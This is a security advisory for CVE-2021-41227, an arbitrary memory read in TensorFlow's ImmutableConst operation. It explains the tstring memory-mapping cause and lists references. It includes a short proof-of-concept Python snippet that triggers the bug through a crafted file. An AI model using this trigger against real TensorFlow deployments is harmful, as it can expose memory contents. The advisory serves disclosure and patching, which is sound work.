CVE-2021-41227: Arbitrary memory read in `ImmutableConst`
(updated )
The ImmutableConst
operation in TensorFlow can be tricked into reading arbitrary memory contents:
import tensorflow as tf
with open('/tmp/test','wb') as f:
f.write(b'\xe2'*128)
data = tf.raw_ops.ImmutableConst(dtype=tf.string,shape=3,memory_region_name='/tmp/test')
print(data)
This is because the tstring
TensorFlow string class has a special case for memory mapped strings but the operation itself does not offer any support for this datatype.
References
- github.com/advisories/GHSA-j8c8-67vp-6mx7
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-636.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-834.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-419.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b
- github.com/tensorflow/tensorflow/commit/3712a2d3455e6ccb924daa5724a3652a86f6b585
- github.com/tensorflow/tensorflow/security/advisories/GHSA-j8c8-67vp-6mx7
- nvd.nist.gov/vuln/detail/CVE-2021-41227
Detect and mitigate CVE-2021-41227 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →